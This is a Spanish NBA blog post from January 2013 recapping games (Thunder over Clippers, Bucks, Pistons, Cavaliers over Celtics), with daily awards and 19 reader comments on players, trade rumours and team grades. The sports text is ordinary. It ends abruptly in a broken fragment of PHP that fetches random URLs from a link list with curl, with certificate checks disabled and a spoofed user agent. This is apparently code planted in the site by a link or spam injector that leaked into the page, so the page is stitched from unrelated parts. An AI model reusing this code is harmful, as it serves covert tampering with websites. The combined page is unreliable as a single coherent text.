La Crónica: Oklahoma suma y sigue

23 de January de 2013 por Pop

Kevin Durant sigue en modo aniquilador y anoche destrozó a los Clippers en un posible adelanto de  la final de conferencia en el oeste (109-97). Durántula anotó 24 puntos en la segunda parte para un total de 32, con un acierto en el tiro alucinante. Su compinche Westbrook también fue un puñal en ataque. Por los angelinos Griffin se cascó otro partidazo con 31 puntos y 11 rebotes pero fue insuficiente dada la baja una noche más de Chris Paul, que no llega a recuperarse del todo de sus molestias en la rodilla. Aun así, los Clippers aguantaron bien hasta la segunda parte, donde el huracán Durant se desató y no hubo mucho más que hablar. Por cierto, no os perdáis la jugada tontita de Griffin que dio lugar a la máxima ventaja de Oklahoma en el tercer cuarto.

En Milwaukee, los Bucks apuntalan aún más sus opciones de playoff gracias a su victoria ante los Sixers (102-110). Una ventaja en el primer cuarto de 10 puntos para los locales fue ya casi irrecuperable para Philadelphia, y cuando parecía que se ponían a tiro en el último cuarto, unos minutos de oro de Jennings dieron al traste con la remontada. Enorme el partido de Ilyasova, además del habitual gran rendimiento conjunto de la pareja Monta Ellis- Brandon Jennings. Por los Sixers esta vez Holiday no estuvo acertado en el lanzamiento y los puntos vinieron desde el banco de la mano de Hawes y Young. Sigue así la buena racha desde que llegó Jim Boylan.

En el partido para intentar salir del pozo del este, los Pistons derrotaron a los Magic por un cómodo 90-105. Orlando plantó cara durante el primer cuarto, en el que lideró el partido, pero poco a poco fue perdiendo terreno hasta quedarse totalmente sin opciones en el tercer cuarto. JJ Redick estuvo demasiado solo en la lucha, mientras que en Detroit repartieron los puntos entre casi todos sus integrantes, liderados por Knight y Monroe. 

Para acabar, nueva derrota de los Celtics ante un rival tan flojito como los Cavaliers y además en casa (95-90). En Boston siguen sin levantar cabeza y empiezan a mirar de reojo el corte para playoffs. Un extraordinario Kyrie Irving sigue reivindicando un puesto para el All Star y anoché se cascó 40 puntazos y unos últimos minutos de puro crack anotando los 11 últimos puntos de su equipo los 2 minutos finales. Por los Celtics el casi triple doble de Rondo y la superioridad en el rebote no compensaron los malos porcentajes de tiro de su equipo.

PREMIOS

MVP: Esta vez ha sido Kyrie Irving el que ha evitado que un día más, Kevin Durant se convierta en el mejor jugador del día en solitario. El de los Cavs anotó 40 puntos y repartió 5 asistencias mientras que Durant se “quedó” en 32, pero repartió 7 asistencias y cogió 7 rebotes.

Rookie: Dobles-dobles para Andre Drummond (11-11) y Jared Sullinger (12-10). Tyler Zeller (6-10-4) se quedó cerca.

Sorpresa: Tras un inicio de temporada decepcionante parece que Ersan Ilyasova ha encontado el ritmo. Ayer fue el mejor de los Bucks con 27 puntos y 16 rebotes. Buenos partidos también de Spencer Hawes con 21 puntos y 12 rebotes, y de Will Bynum, autor de 15 puntos, 4 rebotes y 6 asistencias.

Decepción: Mal día para Glen Davis. Acabó la primera parte con un 4 de 15 en tiros de campo y en la 2ª sólo pudo fallar un tiro y recibir una técnica. A partir de ahí su entrenador decidió sentarlo.

Esfuerzo en vano: A pesar de los 31 puntos y 11 rebotes y 5 asistencias de Blake Griffin, los Clippers ante los Thunder. JJ Redick sólo falló 1 de sus 10 lanzamientos a canasta para acabar el partido con 27 puntos pero también fue insuficiente.

Imágenes | AP Photos / Getty Images

Comenta

19 comentarios a esta entrada

  1. GreenPride dice:
    #1

    De ayer vi el partidazo entre los dos mejores equipos de esta primera mitad de la temporada. Lástima la lesión de CP3 nos impidió ver más partido. Los Clippers aguantaron bien el primer tiempo con gran defensa de Butler-Barnes sobre Durant hasta que éste decidió que ya estaba bien y se cargó el partido. 24 puntos de todos los colores y asistencias cuando le doblaban, qué gozada verle jugar. Sin duda, este jugador está llamado a la leyenda y sus duelos con LeBron (que ya empezaron en las Finales de 2012) pueden marcar una época. Simplemente él sólo ganó el partido, así de claro. Cuando veo jugar a estos dos y con la compañía que tienen se me hace difícil ver otra final en mi mente que no sea la repetición del Heat-Thunder del año pasado.
    Preocupante lo de Boston que tras reaccionar al volver Bradley han vuelto al pozo y vuelven a estar con record negativo. O tienen una reacción pronta o se les pueden complicar incluso los PO.

      Citar

  2. GreenPride dice:
    #2

    Primera mitad de la temporada para todos los equipos y me voy a cascar una pequeña valoración de lo visto hasta ahora.
    Sobresalientes:
    LA Clippers: Con un Griffin bastante mejorado y CP3 comandando, los “pobres” de LA están haciendo un baloncesto fenomenal. Plantilla larguísima en la que todos contribuyen y han recuperado incluso a Odom a un nivel decente lo que era fundamental para ellos. Gran año de Barnes y Crawford tienen probablemente el mejor banco de la liga y están llamados tal como va la temporada a ser el peligro para los Thunder en el Oeste.
    OKC Thunder: Comandados por para mí el MVP de esta primera parte de la temporada, un impresionante Durant, con un Ibaka que sigue en gran progresión y con Martin cumpliendo el papel de anotador de banquillo que dejó bacante Harden, los Thunder funcionan de maravilla siendo el mejor equipo de la NBA. Todos saben su función y la cumplen con esmero incluido un Westbrook algo más director y perdiendo menos balones. Dan miedo y son los máximos candidatos al anillo junto a los Heat.
    SA Spurs: Inconbustibles. Con el mejor TD en años los Spurs siguen siendo un rival temible. Banquillo potente, todos con un rol claro y jugadores luchadores y que saben ganar partidos. Irán de tapados pero son peligrosísimos.
    New York Knicks: De la mano de un Melo que pelea el MVP los Knicks han demostrado que pueden dar mucha guerra aunque han perdido algo de fuelle el último mes. Gran temporada de Felton y Kidd aunténticos motores del equipo y recuperación de JR Smith como sexto hombre de lujo. Veremos cómo siguen de aquí al final de año, cómo se adapta Stoudamire al que necesitarán en PO y si las lesiones les respetan.
    Golden State Warriors: La sorpresa agradable de la temporada. Con Steph Curry en la temporada de su vida, los jovenes Thompson y Barnes rindiendo fenomenal, David Lee funcionando a ritmo all-star y un banquillo que aporta mucho (Landry, Jack) son un equipo divertido y con gran juego que gana partidos. Gran labor de Mark Jackson, candidato a técnico del año. Si vuelve Bogut a un buen nivel, hueso en PO.
    Notables:
    Miami Heat: Cumplen con lo que se espera de ellos liderando el Este aunque su record está algo por debajo de lo esperado. Nada preocupante para un rey LeBron que sigue a un nivel estratosférico y que comanda a su equipo con unos número que asustan. Seguirán al tran tran hasta que falte poco para PO y son los favoritísimos en el Este. Allen no acaba de rendir cómo se suponía salvo en algunos partidos pero llegados PO será un arma temible.
    Brooklyn Nets: A pesar de pasar un mes y medio horrible que le costó el puesto a Avery Jhonson los Nets han vuelto a la buena senda de la mano de PJ Carlesimo y se les vé de nuevo como alternativa en el Este con la mejoría de Deron y de JoJo. Humphries está jugando tan mal que Reggie Evans es titular y aún tiene gente válida como Marshon Brooks que no aporta pero ahora saben a lo que juegan y deben ser tomados en cuenta.
    Indiana Pacers: Tras un inicio más que titubeante Vogel ha conseguido que su equipo vuelva a funcionar a gran nivel de la mano de un temporadón fenomenal de Paul George. Si Granger vuelve en forma o consiguen un traspaso en condiciones por él pueden ser alternativa en el Este. Hibbert no ha dado el salto a pivot dominante que se esperaba de él.
    Chicago Bulls: Increible rendimiento de este equipo sin Derrick Rose. Asusta que pueden dar de sí si Rose consigue ponerse en forma a un buen nivel antes de PO. Sin duda equipo que nadie quiere cuando lleguen las eliminatorias. Gran defensa y temporadón de Boozer (y mira que me gusta poco). Thibboudeau (o como se escriba) para mí técnico del año.
    Memphis Grizzlies: Equipo sólido que sabe a lo que juega con una de las mejores defensas y juego interior de la NBA. Su banquillo le falla y más tras dejar ir a Speights y Ellington para poder afrontar las renovaciones de Gay y Randolph. Les falta algo para ser aspirantes

      Citar

  3. Esteban dice:
    #3

    lo de irving empieza a ir enserio serior, de seguiir asi, el proximo año mete a los cavs en PO y deberia pelear mano a mano con rose para el mejor jugador en la posicion de guardia del este

    es mas me atrevo a decir que es el ultimo año de wade como escolta titular del este, irving se quedara con su lugar

    por otro lado drummond no solo es potencial, esta jugando como si fuera un pick numero uno del draft, uanto equipos que lo dejaron pasar se deben estar agarrando la cabeza?

      Citar

  4. Esteban dice:
    #4

    vuelve a sonar howard en los nets

    3 bandas

    lopez a minesota

    love a los lakers

    howard a nets

    tendria sentido desde varios lados, parece que los wolves salen perdiendo pero no hay que olvidarse del descontento que tiene con la directiva y mas antes que despues pedira una trade o no renovara, mientras que por el momento no van las cosas muy bien alli, lejos de PO y con Love lesionada
    luiego de este le quedan solo dos años de contrato, su salida es inmenente, dificilmente puedan sacar por elgo mejor q lopez (5to en eficiencia en toda la liga)

    los lakers harian un negocion sacandose a howard de ensima, pues esta claro que no va a renovar y sumando nad amenos que a love, mucho cuidado si eso sale bien, la carrera por el titulo aun no termino

    los nets pierden a un buen pivote con contrato y suman a otro con uno a punto de expirar, pero todo indicaria que superman si renovaria alli

    todos ganando para mi gusto

      Citar

  5. rumbero dice:
    #5

    Esteban:
    por otro lado drummond no solo es potencial, esta jugando como si fuera un pick numero uno del draft, uanto equipos que lo dejaron pasar se deben estar agarrando la cabeza?

    Ojo con Drummond porque no suena tanto como los Davis, Lillard y Barnes al no pasar de los 20 minutos por partido, pero está mostrando una regularidad tremenda, algo de lo que precisamente se dudó a la hora de elegirlo más arriba en el draft. Yo lo he ido siguiendo algo más por eso de tenerlo en la hoops y los que dicen que puede ser un Howard en potencia no van desencaminados. Incluso el otro dia contra los Celtics los verdes ya intentaron 2/3 veces el Hack-a-Drummond, aunque con mal resultado(debe mejorar bastante en los tiros libres). Además como dato, en esa estadística que gusta tanto en la NBA como es el PER de Hollinger el tio está en la posición 11 de toda la liga. No está mal.

      Citar

  6. Denise dice:
    #6

    A mi Drummond me encanta, es lo mas parecido a Center dominante desde la aparición de Howard. Si Detroit sabe moverse bien, con la pareja Monroe-Drummond y un exterior de garantías pueden hacer cosas importantes. Aunque a mi Monroe suele decepcionarme un poco, simpre me quedo esperando algo más de él.

      Citar

  7. Esteban dice:
    #7

    si le faltan miles de movimientos y quiza nunca sea un tio de 20 pountos por juego como lo es howard o lo fue al menos, pero sin duda puede ser un pivote de 12 o 14 rebotes por partido y sus 12 o 14 puntos, alli veo su techo

    pero viendo lo que cuesta encontrar un centro que haga eso, no es nada errado

    monroe-drummond puede llegar a ser una pareja formidable, tiene poco mas en este momento detroit par ailkusionarse pero dumars tendra espacio para dar el salto el proximo año, ya se imponen los trades de prince y stuckey

      Citar

  8. Denise dice:
    #8

    los lakers harian un negocion sacandose a howard de ensima, pues esta claro que no va a renovar y sumando nad amenos que a love, mucho cuidado si eso sale bien, la carrera por el titulo aun no termino

    Bueno eso de que no vaa renovar….no se sabe.

    Yo creo que quiere irse pero quizas renueven para que no digan de él que se fue a Lakers, fracasó estrepitosamente y se bajó del barco.

      Citar

  9. rumbero dice:
    #9

    Esteban:
    si le faltan miles de movimientos y quiza nunca sea un tio de 20 pountos por juego como lo es howard o lo fue al menos, pero sin duda puede ser un pivote de 12 o 14 rebotes por partido y sus 12 o 14 puntos, alli veo su techo

    A nivel ofensivo es muy limitado, no tiene tiro de media distancia y es un mal tirador de TL, pero yo le daría algo más de techo. Howard ha promediado siempre cerca de los 20 puntos faltándole también la tira de movimientos. De hecho en los últimos 10 partidos de Drummond en los que está jugando más regularmente promediando 21.6 min está ya en 9.6/8.7. Sólo con el físico que tiene (y que puede llegar a tener) va a hacer mucho daño en la pintura rival. Y luego está su defensa que es más que buena con 19 años que tiene. Para mi tiene pinta de center dominante de la liga si no se estropea por el camino

      Citar

  10. GreenPride dice:
    #10

    Bien:
    Atlanta Hawks: Empezaron fenomenal pero han caido en barrena, si siguen así serán candidatos a una nota peor. Josh Smith y Horford hacen daño por dentro pero Smith acaba contrato y empieza a dar problemas en el vestuario. Equipo poco fiable
    Milwaukee: Al ritmo de su backourt Jennings-Ellis y con aportaciones sorprendentes de gente como Yliasova o Sanders los Bucks se ven en PO. Temporada exitosa para ellos si esto acaba así aunque les falta algo para ser más duros
    Denver: Se esperaba más de ellos aunque no están mal colocados. Iguodala no aporta tanto como se esperaba y dependen de la intensidad de Faried y del día de sus lanzadores. Equipo incómodo cuando juega a su ritmo rápido que está llamado a ser de los que animen lo que queda de temporada.
    Utah: Amparados en lo difícil que es ganarles en su casa y en su gran juego interior los Jazz cumplen más que bien y están en PO. Gran temporada de Hayward.
    Houston: Harden demuestra que merecía la pena hacer el esfuerzo por él y ya es una de las estrellas de la liga. Gran rendimiento de Asik ganándose su contrato les falta tener a un Lin que marque más diferencias aunque el equipo está funcionando mejor de lo esperado. Hubiesen sido notable de no ser por esta última mala racha.
    Aprobados:
    Portland: Rozando PO para el equipo de las desgracias. La gran noticia es Lillard, sin duda el ROY de esta primera parte del año. Batum y Aldridge siguen siendo los bastiones de un equipo al que le falta algo para dar el salto. Año sabático para Claver.
    Minnesotta: Empezaron ganando partidos sin que nadie se lo explicara pero entre las lesiones y los líos con su estrella Love parece que han empezado definitivamente la cuesta abajo. Gran temporada rookie para Shved y gran año de Pekovic pero necesitan a Ricky recuperado 100% y a Love en su mejor nivel si quieren llegar a PO y a día de hoy no tienen ni lo uno ni lo otro
    Orlando: Se esperaba un cataclismo tras la salida de Howard y no está siendo para tanto. Evidentemente lejos de PO pero la temporada deja buenas sensaciones en gente como Davis, Reddick y sobre todo Vucevic
    Cleveland: Pocas victorias pero varios de sus jugadores de futuro rindiendo a buen nivel, especialmente un Kyrie Irving que mejora a pasos agigantados. Lástima la lesión de Varejao que estaba haciendo un gran año.
    Toronto: Tras un inicio más que dubitativo los Raptors se han recuperado muy bien. Gran temporada de Calde que le ha comido la tostada a Lowry. Ni éste ni Bargnani son jugadores franquicia y lo están demostrando
    New Orleans: Los Hornets se ganan el aprobado por su gran racha desde la vuelta de Eric Gordon. Su esperanza Davis luce y si siguen sanos pueden ser animadores de la segunda parte de la temporada
    Detroit: No se esperaba gran cosa de ellos salvo que sus jóvenes vayan evolucionando y el equipo cumple con las expectativas.
    Suspensos:
    LA Lakers: Casi una mención especial para ellos. Primera mitad de temporada desastrosa o recuperan pronto o van camino de uno de los batacazos más grandes de la historia. Solo Artest y Kobe han rendido conforme a lo esperado y Kobe a ratos. Howard está lejos de ser el pivot dominante que se supone que es con muchos partidos infames y un rendimiento muy irregular, a Nash se le notan los años y los de sus compañeros que no hacen el juego rápido que hacían sus Suns y Pau está entre mal físicamente, cabreado permanente y mal utilizado por sus entrenadores empeñados en sacarle de la pintura. Además han sufrido a 2 entrenadores que no parecen irle a los jugadores que tienen y el mal año de los que debían ser sus pilares de banquillo Meeks y Jamison. Si no llegan a PO serán una de las mayores sorpresas negativas que nunca he visto y por lo visto en estos últimos partidos no parece que tengan muchas opciones. D’Antoni ve peligrar su futuro NBA, pues tras esto (más su etapa en Knicks) parece difícil que alguien le contrate. Esperpento.
    Boston Celtics: La otra gran franquicia histórica también está suspendiendo muy a mi pesar. Los años se notan en KG y Pierce y la irregularidad del equipo es manifiesta capaz de rachas positivas e inmediatamente después otras negativas. Muchos hombres importantes muy irregulares sobre todo gente como Bass, Green o Terry que son importantísimos para el equipo. Un rebote de chiste y la falta de Bradley casi todo lo que llevamos de año también han influido. Queda por ver con qué racha se acaban quedando. ¿Podrán repetir lo del año pasado y acabar cogiendo la buena onda? Si lo hacen ojo en PO, si no pueden hasta quedar fuera. La buena noticia que Sullinger sí parece un jugador NBA.
    Philadelphia: Se esperaba mucho de este equipo pero están estrellándose tanto como su fichaje estrella y llamado a darles el salto Andrew Bynum. Ni juega ni deja a los demás centrarse. El equipo se colapsa con gran facilidad en ataque y depende excesivamente de Holiday. Paso adelante de Turner pero no suficiente para suplir a Iguodala. Decepción.
    Dallas: Empezaron bien sin Dirk pero han entrado en un socavón sin fondo del que no los ha sacado ni la vuelta de su astro. No eran aspirantes al anillo pero su temporada decepciona mucho pues habían contratado veteranos supuestamente contrastados.
    Phoenix: Se sabía que pasarían problemas pero ¿Tantos como para ser últimos del Oeste?
    Sacramento, Charlotte y Washington: Equipos que se esperaban en el fondo y han cumplido expectativas de sobra. Cousins no se centra, los Bobcats no tienen plantilla y los Wizards fueron el hazmerreir hasta las últimas dos semanas que han recuperado algo con la vuelta de Wall

      Citar

  11. Esteban dice:
    #11

    green, los lakers no pueden ser catalogados como en suspenso, sea como sea que termine la temporada regular, esta habra sido un fracaso, aun en el caso de que mejoren notablemente, como mucho podran llegar a un 5to puesto, lo que sin dudas es lamentable, dados que estaban hechos para desfilar, aun asi dudo que lleguen a ese octavo puesto dadas las cosas como estan

      Citar

  12. GreenPride dice:
    #12

    Esteban estoy de acuerdo por eso he empezado diciendo que merecen una mención especial, pero voy a guardarles el calificativo desastre histórico y cosas por el estilo para el final de la temporada por si ocurriese un milagro que a día de hoy no parece probable. No olvidemos que queda temporada y los PO, aunque no tiene pinta de que la cosa vaya a cambiar para no considerarlos un fracaso total. Pero vamos, que estoy de acuerdo contigo en que su temporada está siendo lamentable

      Citar

  13. Ruxixón dice:
    #13

    Anonadado me hallo por los rumores de traspaso de Howard.

    Ayer comentaba que las soluciones de los Lakers pasan por traspasar a Gasol pero el rendimiento de Howard es bastante triste,si lo que pretenden es construir el futuro de los Lakers en torno a él.Dicho esto,yo soy el ruso de los Nets y ni me planteo soltar a Lopez (menos por un Howard que pasó de mi proyecto) y soy el dueño de Minny y ni me planteo soltar a Love (menos con la suerte que tengo con las lesiones por el bueno de Brook Lopez) .Por una vez que los Lakers paguen su mala gestión y que quede retratado todo el mundo allí:Buss Jr.,Kupchak,D’Antoni,Howard…

    Por cierto,me encantaría ver a Cousins de amarillo,independiente de todo esto de Howard,etc.

    PD.no soy de los Celtics

      Citar

  14. Denise dice:
    #14

    A ver, creo que sois muy duros con Howard. Está fracasando, OK, pero no solo él, está fracasando todo el equipo. Howard no está acabado ni mucho menos, yo ni loco me plantearía traspasarlo, debería ser el jugador franquicia de Lakers en los próximos años. Lo que Buss debe intentar es convencerlo de que renueve, y posteriormente que Kupchak se cargue a D’Anthoni (o que Buss se cargue a éstos 2) y/o hacer otro estilo de juego donde se metan mas balones por dentro y éstos reciban en mejor posición.

    Según algunos comentarios parece que hablais de Tyrus Thomas en vez de un tio que te hace un 20-10 con la gorra como DH siempre y cuando orientes tu estilo de juego a sus necesidades.

      Citar

  15. Ruxixón dice:
    #15

    Nadie discute la calidad de Howard,yo discuto que sea lo suficientemente maduro para ser el jugador franquicia de un equipo como los Lakers.Tuvo ese rol en Orlando y se quiso ir de ahí,riéndose de los aficionados y echando a un entrenador que había dado muy buenos días a los Magic.Ahora se junta en un equipo con 3 gallos más que quieren su protagonismo ofensivo,¿sabía dode se metía?Cosas del karma,mi opinión es que lo que le pasa ahora se lo merece.

      Citar

  16. nba dice:
    #16

    Howard, idas de olla aparte , hace lo que le dejan,
    que va a hacer? subir a la linea de tres y quitarle el balon a Kobe??, independientemente del acierto estratosferico que esta teniendo Kobe esta temporada, la suma total de tiros que hace Kobe debería ser la que tendrian que hacer sus dos torres , que el menda parece que ahora le da por sacar el ventilador…

      Citar

  17. Esteban dice:
    #17

    por un momentillo podemos plantearnos que HOWARD luego de la operacion no volvera a ser el que fue?

    no se, medio que su recuperacion, y dura operacion pasaron de largo, cuando de entrada HOWARD se cargo con unos 30 y 12 al comienzo de la liga contra malos, muy malos equipos, y parecia estar recuperado

    pero eso esta lejos de ser real, el HEAT sinceramente lo comio, no le permitio recibir ni moverse con velocidad, ha perdido explosion y hasta algo de fuerza me atreveria a decir, y se nota tambien mucho en defensa, llega tarde a las ayudas, no salta a la marca como antes

    con todo este, aun es un tio capaz de estar en el 20-10, porque de hecho cada tanto se cruza con algun equipucho que sencillamente juegan contra los lakers a perder por poco y DH12 hace un desastre
    pero en los partidos duros y verdaderamente determinantes, no ha jugado al nivel que venia mostrando los ultimos años de su carrera

    el año pasado a esta altura, se discutia quien era mejor, si howard o bynum y por fin llego el encuentro esperado entre ambos, y howard se despacho con 21 puntos y 23 rebotes frente a quien era supuestamente su rivel, hoy si se enfrentara a byn um, no haria la mitad de esos numeros

    quiza HOWARD no se recupero bien y quiza nunca lo haga, no seria el primer jugador que queda lastrado luego de una dura operacion

    es para pensarlo

      Citar

  18. Esteban dice:
    #18

    miren este video por favor

    miren a HOWARD, la velocidad, el giro y contra giro, los ganchos altos y esteticos

    alguien cree que hoy HOWARD dominaria a BYNUM o a GASOL de se modo?

      Citar

  19. Lucho dice:
    #19

    Como dicen uds los españoles, como molan los Warriors. Molan mucho
    Si el lunes le ganaban a los Clippers, ahora lo mismo con OKC
    Gran partido de Lee. Y cuanto aporta Landry, clave hoy. El gran Curry, robo clave faltando 10 segundos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>